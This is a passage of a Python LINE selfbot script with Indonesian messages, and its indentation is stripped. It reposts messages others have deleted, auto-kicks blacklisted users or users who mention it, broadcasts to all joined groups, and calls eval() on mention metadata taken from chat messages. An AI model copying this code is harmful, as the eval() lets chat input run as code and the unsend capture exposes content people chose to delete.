ret_ = "「 Pesan Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(Aditmadzs.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n• Pesannya : {}".format(str(msg_dict[msg_id]["text"]))
aditmadzs.sendMessage(at, str(ret_))
del msg_dict[msg_id]
except Exception as e:
print(e)
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = aditmadzs.getGroup(at)
Aditmadzs = aditmadzs.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ += "• Pengirim : {}".format(str(Aditmadzs.displayName))
ret_ += "\n• Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n• Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "{}".format(str(msg_dict1[msg_id]["text"]))
aditmadzs.sendMessage(at, str(ret_))
aditmadzs.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg.to in simisimi:
try:
if msg.text is not None:
simi = msg.text
r = requests.get("http://corrykalam.pw/api/chatbot.php?text="+simi)
data = r.text
data = json.loads(data)
if data["status"] == 200:
aditmadzs.sendMessage(msg.to, str(data["answer"]))
except Exception as error:
pass
if msg.to in translateen:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='en')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translateid:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='id')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translateth:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='th')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translatetw:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='zh-tw')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if msg.to in translatear:
try:
if msg.text is not None:
kata = msg.text
translator = Translator()
hasil = translator.translate(kata, dest='ar')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
except Exception as error:
pass
if op.type == 25 or op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
aditmadzs.sendMessage(msg.to, wait["Respontag"])
aditmadzs.sendMessage(msg.to, None, contentMetadata={"STKID":"21715710","STKPKGID":"9662","STKVER":"2"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentiongift"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
idth = ["a0768339-c2d3-4189-9653-2909e9bb6f58","ec4a14ea-7437-407b-aee7-96b1cbbc1b4b","f35bd31f-5ec7-4b2f-b659-92adf5e3d151","ba1d5150-3b5f-4768-9197-01a3f971aa34","2b4ccc45-7309-47fe-a006-1a1edb846ddb","168d03c3-dbc2-456f-b982-3d6f85f52af2","d4f09a5f-29df-48ac-bca6-a204121ea165","517174f2-1545-43b9-a28f-5777154045a6","762ecc71-7f71-4900-91c9-4b3f213d8b26","2df50b22-112d-4f21-b856-f88df2193f9e"]
plihth = random.choice(idth)
jenis = ["5","6","7","8"]
plihjenis = random.choice(jenis)
aditmadzs.sendMessage(msg.to, "Yang suka ngetag minta di gift yaa!?\nCek di chat, udah aku gift tuh...")
aditmadzs.sendMessage(msg._from, None, contentMetadata={"PRDID":plihth,"PRDTYPE":"THEME","MSGTPL":plihjenis}, contentType=9)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
aditmadzs.sendMessage(msg.to, "Jangan tag saya....")
aditmadzs.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,"「Cek ID Sticker」\n🐚 STKID : " + msg.contentMetadata["STKID"] + "\n⏩ STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\n⏩ STKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = aditmadzs.getContact(msg.contentMetadata["mid"])
path = aditmadzs.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
aditmadzs.sendMessage(msg.to,"⏩ Nama : " + msg.contentMetadata["displayName"] + "\n⏩ MID : " + msg.contentMetadata["mid"] + "\n⏩ Status : " + contact.statusMessage + "\n⏩ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
aditmadzs.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.contentType == 0:
msg_dict[msg.id] = {"text":msg.text,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 1:
path = aditmadzs.downloadObjectMsg(msg_id)
msg_dict[msg.id] = {"text":'Gambarnya dibawah',"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
stk_id = msg.contentMetadata["STKID"]
stk_ver = msg.contentMetadata["STKVER"]
pkg_id = msg.contentMetadata["STKPKGID"]
ret_ = "\n\n「 Sticker Info 」"
ret_ += "\n• Sticker ID : {}".format(stk_id)
ret_ += "\n• Sticker Version : {}".format(stk_ver)
ret_ += "\n• Sticker Package : {}".format(pkg_id)
ret_ += "\n• Sticker Url : line://shop/detail/{}".format(pkg_id)
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = aditmadzs.downloadFileURL(data)
msg_dict1[msg.id] = {"text":str(ret_),"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
aditmadzs.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = aditmadzs.getContact(msg.contentMetadata["mid"])
path = aditmadzs.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
aditmadzs.sendMessage(msg.to,"⏩ Nama : " + msg.contentMetadata["displayName"] + "\n⏩ MID : " + msg.contentMetadata["mid"] + "\n⏩ Status : " + contact.statusMessage + "\n⏩ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
aditmadzs.sendImageWithURL(msg.to, image)
#===========EKLE BOT============#
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
aditmadzs.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
aditmadzs.sendMessage(msg.to,"Contact itu bukan anggota Aditmadzs BOT")
#===========PERSONEL EKLE============#
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
aditmadzs.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
aditmadzs.sendMessage(msg.to,"Contact itu bukan staff")
#===========ADD ADMIN============#
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
aditmadzs.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
aditmadzs.sendMessage(msg.to,"Contact itu bukan admin")
#===========KARA LİSTE EKLE============#
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
aditmadzs.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
aditmadzs.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#===========TALKBAN============#
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
aditmadzs.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
aditmadzs.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
aditmadzs.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
aditmadzs.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#===========FOTOĞRAF GÜNCELLEME============#
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = aditmadzs.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
aditmadzs.sendMessage(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = aditmadzs.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
aditmadzs.updateGroupPicture(msg.to, path)
aditmadzs.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ADITMADZSfoto"]:
path = aditmadzs.downloadObjectMsg(msg_id)
del Setmain["ADITMADZSfoto"][mid]
aditmadzs.updateProfilePicture(path)
aditmadzs.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["ADITMADZSfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["ADITMADZSfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
aditmadzs.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
aditmadzs.sendMessage(msg.to, str(helpMessage))
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
aditmadzs.sendMessage(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
aditmadzs.sendMessage(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help bot":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
aditmadzs.sendMessage(msg.to, str(helpMessage1))
elif cmd == "meme":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage2 = infomeme()
aditmadzs.sendMessage(msg.to, str(helpMessage2))
elif cmd == "translate":
if wait["selfbot"] == True:
if msg._from in admin:
helpTranslate = translate()
aditmadzs.sendMessage(msg.to, str(helpTranslate))
if cmd == "unsend on":
if msg._from in admin:
wait["unsend"] = True
aditmadzs.sendMessage(msg.to, "Deteksi Unsend Diaktifkan")
if cmd == "unsend off":
if msg._from in admin:
wait["unsend"] = False
aditmadzs.sendMessage(msg.to, "Deteksi Unsend Dinonaktifkan")
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = " ┏━━━━━━━━━━━━━━━━━\n┃┃SEAL TEAM \n┃┣━━━━━━━━━━━━━━━━━━━━\n"
if wait["unsend"] == True: md+="┃┃🍁 ✔️ Unsend「ON」\n"
else: md+="┃┃🍁 ✖ Unsend「OFF」\n"
if wait["sticker"] == True: md+="┃┃🍁 ✔️ Sticker「ON」\n"
else: md+="┃┃🍁 ✖ Sticker「OFF」\n"
if wait["contact"] == True: md+="┃┃🍁 ✔️ Contact「ON」\n"
else: md+="┃┃🍁 ✖ Contact「OFF」\n"
if wait["talkban"] == True: md+="┃┃🍁 ✔️ Talkban「ON」\n"
else: md+="┃┃🍁 ✖ Talkban「OFF」\n"
if wait["Mentionkick"] == True: md+="┃┃🍁 ✔️ Notag「ON」\n"
else: md+="┃┃🍁 ✖ Notag「OFF」\n"
if wait["detectMention"] == True: md+="┃┃🍁 ✔️ Respon「ON」\n"
else: md+="┃┃🍁 ✖ Respon「OFF」\n"
if wait["Mentiongift"] == True: md+="┃┃🍁 ✔️ Respongift「ON」\n"
else: md+="┃┃🍁 ✖ Respongift「OFF」\n"
if wait["autoJoin"] == True: md+="┃┃🍁 ✔️ Autojoin「ON」\n"
else: md+="┃┃🍁 ✖ Autojoin「OFF」\n"
if settings["autoJoinTicket"] == True: md+="┃┃🍁 ✔️ Jointicket「ON」\n"
else: md+="┃┃🍁 ✖ Jointicket「OFF」\n"
if wait["autoAdd"] == True: md+="┃┃🍁 ✔️ Autoadd「ON」\n"
else: md+="┃┃🍁 ✖ Autoadd「OFF」\n"
if msg.to in welcome: md+="┃┃🍁 ✔️ Welcome「ON」\n"
else: md+="┃┃🍁 ✖ Welcome「OFF」\n"
if msg.to in simisimi: md+="┃┃🍁 ✔️ Simisimi「ON」\n"
else: md+="┃┃🍁 ✖ Simisimi「OFF」\n"
if wait["autoLeave"] == True: md+="┃┃🍁 ✔️ Autoleave「ON」\n"
else: md+="┃┃🍁 ✖ Autoleave「OFF」\n"
if msg.to in protectqr: md+="┃┃🍁 ✔️ Protecturl「ON」\n"
else: md+="┃┃🍁 ✖ Protecturl「OFF」\n"
if msg.to in protectjoin: md+="┃┃🍁 ✔️ Protectjoin「ON」\n"
else: md+="┃┃🍁 ✖ Protectjoin「OFF」\n"
if msg.to in protectkick: md+="┃┃🍁 ✔️ Protectkick「ON」\n"
else: md+="┃┃🍁 ✖ Protectkick「OFF」\n"
if msg.to in protectcancel: md+="┃┃🍁 ✔️ Protectcancel「ON」\n"
else: md+="┃┃🍁 ✖ Protectcancel「OFF」\n"
if msg.to in protectinvite: md+="┃┃🍁 ✔️ Protectinvite「ON」\n"
else: md+="┃┃🍁 ✖ Protectinvite「OFF」\n"
aditmadzs.sendMessage(msg.to, md+"┃┣━━━━━━━━━━━━━━━━━━━━\n┃┃❧ Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\n┃┃❧ Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]\n ┗━━━━━━━━━━━━━━━━━")
elif cmd == "status translate":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = " ┏━━━━━━━━━━━━━━━━━\n┃┃ SEAL TEAM \n┃┣━━━━━━━━━━━━━━━━━━━━\n"
if msg.to in translateen: md+="┃┃🍁 ✔️ English「ON」\n"
else: md+="┃┃🍁 ✖ English「OFF」\n"
if msg.to in translateid: md+="┃┃🍁 ✔️ Indonesia「ON」\n"
else: md+="┃┃🍁 ✖ Indonesia「OFF」\n"
if msg.to in translateth: md+="┃┃🍁 ✔️ Thailand「ON」\n"
else: md+="┃┃🍁 ✖ Thailand「OFF」\n"
if msg.to in translatetw: md+="┃┃🍁 ✔️ Taiwan「ON」\n"
else: md+="┃┃🍁 ✖ Taiwan「OFF」\n"
if msg.to in translatear: md+="┃┃🍁 ✔️ Arab「ON」\n"
else: md+="┃┃🍁 ✖ Arab「OFF」\n"
aditmadzs.sendMessage(msg.to, md+"┃┣━━━━━━━━━━━━━━━━━━━━\n┃┃❧ Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\n┃┃❧ Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]\n ┗━━━━━━━━━━━━━━━━━")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
aditmadzs.sendMessage(msg.to,"Creator Bot")
ma = ""
for i in creator:
ma = aditmadzs.getContact(i)
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Aditmadzs SelfBOT 1 Assist 」\n")
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg._from}
aditmadzs.sendMessage1(msg)
elif text.lower() == "mymid":
if msg._from in admin:
aditmadzs.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = aditmadzs.getContact(key1)
aditmadzs.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = aditmadzs.getContact(key1)
aditmadzs.sendMessage(msg.to, "❧ Nama : "+str(mi.displayName)+"\n🐚 Mid : " +key1+"\n🐚 Status : "+str(mi.statusMessage))
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(aditmadzs.getContact(key1)):
aditmadzs.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
aditmadzs.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
aditmadzs.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
aditmadzs.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
aditmadzs.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ki.removeAllMessages(op.param2)
aditmadzs.sendMessage(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = aditmadzs.getGroupIdsJoined()
for group in saya:
aditmadzs.sendMessage(group,"=======[BROADCAST]=======\n\n"+pesan+"\n\nCreator : line.me/ti/p/~adit_cmct")
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
aditmadzs.sendMessage(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
aditmadzs.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
aditmadzs.sendMessage(msg.to, "「Setkey」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
aditmadzs.sendMessage(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in creator:
aditmadzs.sendMessage(msg.to, "Restart Sukses Bos!...")
Setmain["restartPoint"] = msg.to
restartBot()
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
aditmadzs.sendMessage(msg.to,bot)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = aditmadzs.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(aditmadzs.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
aditmadzs.sendMessage(msg.to, "❧ BOT Grup Info\n\n ❧ Nama Group : {}".format(G.name)+ "\n🐚 ID Group : {}".format(G.id)+ "\n🐚 Pembuat : {}".format(G.creator.displayName)+ "\n🐚 Waktu Dibuat : {}".format(str(timeCreated))+ "\n🐚 Jumlah Member : {}".format(str(len(G.members)))+ "\n🐚 Jumlah Pending : {}".format(gPending)+ "\n🐚 Group Qr : {}".format(gQr)+ "\n🐚 Group Ticket : {}".format(gTicket))
aditmadzs.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
aditmadzs.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
aditmadzs.sendMessage(msg.to, str(e))
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = aditmadzs.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = aditmadzs.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(aditmadzs.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "⏩ BOT Grup Info\n"
ret_ += "\n⏩ Name : {}".format(G.name)
ret_ += "\n⏩ ID : {}".format(G.id)
ret_ += "\n⏩ Creator : {}".format(gCreator)
ret_ += "\n⏩ Created Time : {}".format(str(timeCreated))
ret_ += "\n⏩ Member : {}".format(str(len(G.members)))
ret_ += "\n⏩ Pending : {}".format(gPending)
ret_ += "\n⏩ Qr : {}".format(gQr)
ret_ += "\n⏩ Ticket : {}".format(gTicket)
ret_ += ""
aditmadzs.sendMessage(to, str(ret_))
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = aditmadzs.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = aditmadzs.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "⏩ "+ str(no) + ". " + mem.displayName
aditmadzs.sendMessage(to,"⏩ Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = aditmadzs.getGroupIdsJoined()
group = groups[int(number)-1]
for i in group:
ginfo = aditmadzs.getGroup(i)
if ginfo == group:
ki.leaveGroup(i)
aditmadzs.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = aditmadzs.getAllContactIds()
for i in gid:
G = aditmadzs.getContact(i)
a = a + 1
end = "\n"
ma += "┃┃ " + str(a) + ". " +G.displayName+ "\n"
aditmadzs.sendMessage(msg.to,"┏━━[ FRIEND LIST ]\n┃┃\n"+ma+"┃┃\n┗━━[ Total「"+str(len(gid))+"」Friends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = aditmadzs.getGroupIdsJoined()
for i in gid:
G = aditmadzs.getGroup(i)
a = a + 1
end = "\n"
ma += "┃┃ " + str(a) + ". " +G.name+ "\n"
aditmadzs.sendMessage(msg.to,"┏━━[ GROUP LIST ]\n┃┃\n"+ma+"┃┃\n┗━━[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "┃┃ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"┏━━[ GROUP LIST ]\n┃┃\n"+ma+"┃┃\n┗━━[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventedJoinByTicket = False
ki.updateGroup(X)
ki.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventedJoinByTicket = True
ki.updateGroup(X)
ki.sendMessage(msg.to, "Url Closed")
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = ki.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
elif cmd == "reject":
if wait["selfbot"] == True:
if msg._from in creator:
ginvited = aditmadzs.getGroupIdsInvited()
if ginvited != [] and ginvited != None:
for gid in ginvited:
aditmadzs.rejectGroupInvitation(gid)
aditmadzs.sendMessage(to, "Berhasil tolak sebanyak {} undangan grup".format(str(len(ginvited))))
else:
aditmadzs.sendMessage(to, "Tidak ada undangan yang tertunda")
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
aditmadzs.sendMessage(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
ki.sendMessage(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ADITMADZSfoto"][mid] = True
aditmadzs.sendMessage(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["ADITMADZSfoto"][Amid] = True
ki.sendMessage(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = aditmadzs.getProfile()
profile.displayName = string
aditmadzs.updateProfile(profile)
